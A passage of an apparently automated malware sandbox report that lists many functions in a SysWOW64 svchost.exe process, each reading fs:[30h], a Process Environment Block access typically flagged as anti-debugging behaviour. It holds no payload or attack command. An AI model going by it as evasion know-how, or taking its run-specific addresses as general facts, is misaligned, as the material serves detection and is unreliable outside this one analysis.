                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392826B mov eax, dword ptr fs:[00000030h]1_2_0392826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0625D mov eax, dword ptr fs:[00000030h]1_2_03A0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03970185 mov eax, dword ptr fs:[00000030h]1_2_03970185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4180 mov eax, dword ptr fs:[00000030h]1_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4180 mov eax, dword ptr fs:[00000030h]1_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A061E5 mov eax, dword ptr fs:[00000030h]1_2_03A061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039601F8 mov eax, dword ptr fs:[00000030h]1_2_039601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov ecx, dword ptr fs:[00000030h]1_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0115 mov eax, dword ptr fs:[00000030h]1_2_039F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960124 mov eax, dword ptr fs:[00000030h]1_2_03960124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C156 mov eax, dword ptr fs:[00000030h]1_2_0392C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C8158 mov eax, dword ptr fs:[00000030h]1_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04164 mov eax, dword ptr fs:[00000030h]1_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04164 mov eax, dword ptr fs:[00000030h]1_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov ecx, dword ptr fs:[00000030h]1_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393208A mov eax, dword ptr fs:[00000030h]1_2_0393208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov eax, dword ptr fs:[00000030h]1_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov ecx, dword ptr fs:[00000030h]1_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039280A0 mov eax, dword ptr fs:[00000030h]1_2_039280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C80A8 mov eax, dword ptr fs:[00000030h]1_2_039C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B20DE mov eax, dword ptr fs:[00000030h]1_2_039B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C0F0 mov eax, dword ptr fs:[00000030h]1_2_0392C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039720F0 mov ecx, dword ptr fs:[00000030h]1_2_039720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0392A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039380E9 mov eax, dword ptr fs:[00000030h]1_2_039380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60E0 mov eax, dword ptr fs:[00000030h]1_2_039B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4000 mov ecx, dword ptr fs:[00000030h]1_2_039B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6030 mov eax, dword ptr fs:[00000030h]1_2_039C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A020 mov eax, dword ptr fs:[00000030h]1_2_0392A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C020 mov eax, dword ptr fs:[00000030h]1_2_0392C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932050 mov eax, dword ptr fs:[00000030h]1_2_03932050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6050 mov eax, dword ptr fs:[00000030h]1_2_039B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395C073 mov eax, dword ptr fs:[00000030h]1_2_0395C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D678E mov eax, dword ptr fs:[00000030h]1_2_039D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039307AF mov eax, dword ptr fs:[00000030h]1_2_039307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E47A0 mov eax, dword ptr fs:[00000030h]1_2_039E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C7C0 mov eax, dword ptr fs:[00000030h]1_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B07C3 mov eax, dword ptr fs:[00000030h]1_2_039B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE7E1 mov eax, dword ptr fs:[00000030h]1_2_039BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930710 mov eax, dword ptr fs:[00000030h]1_2_03930710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960710 mov eax, dword ptr fs:[00000030h]1_2_03960710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C700 mov eax, dword ptr fs:[00000030h]1_2_0396C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov ecx, dword ptr fs:[00000030h]1_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC730 mov eax, dword ptr fs:[00000030h]1_2_039AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930750 mov eax, dword ptr fs:[00000030h]1_2_03930750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE75D mov eax, dword ptr fs:[00000030h]1_2_039BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4755 mov eax, dword ptr fs:[00000030h]1_2_039B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov esi, dword ptr fs:[00000030h]1_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938770 mov eax, dword ptr fs:[00000030h]1_2_03938770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039666B0 mov eax, dword ptr fs:[00000030h]1_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C6A6 mov eax, dword ptr fs:[00000030h]1_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov eax, dword ptr fs:[00000030h]1_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972619 mov eax, dword ptr fs:[00000030h]1_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE609 mov eax, dword ptr fs:[00000030h]1_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E627 mov eax, dword ptr fs:[00000030h]1_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03966620 mov eax, dword ptr fs:[00000030h]1_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968620 mov eax, dword ptr fs:[00000030h]1_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393262C mov eax, dword ptr fs:[00000030h]1_2_0393262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C640 mov eax, dword ptr fs:[00000030h]1_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962674 mov eax, dword ptr fs:[00000030h]1_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E59C mov eax, dword ptr fs:[00000030h]1_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov eax, dword ptr fs:[00000030h]1_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov ecx, dword ptr fs:[00000030h]1_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964588 mov eax, dword ptr fs:[00000030h]1_2_03964588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039365D0 mov eax, dword ptr fs:[00000030h]1_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039325E0 mov eax, dword ptr fs:[00000030h]1_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6500 mov eax, dword ptr fs:[00000030h]1_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA49A mov eax, dword ptr fs:[00000030h]1_2_039EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039644B0 mov ecx, dword ptr fs:[00000030h]1_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BA4B0 mov eax, dword ptr fs:[00000030h]1_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039364AB mov eax, dword ptr fs:[00000030h]1_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039304E5 mov ecx, dword ptr fs:[00000030h]1_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C427 mov eax, dword ptr fs:[00000030h]1_2_0392C427
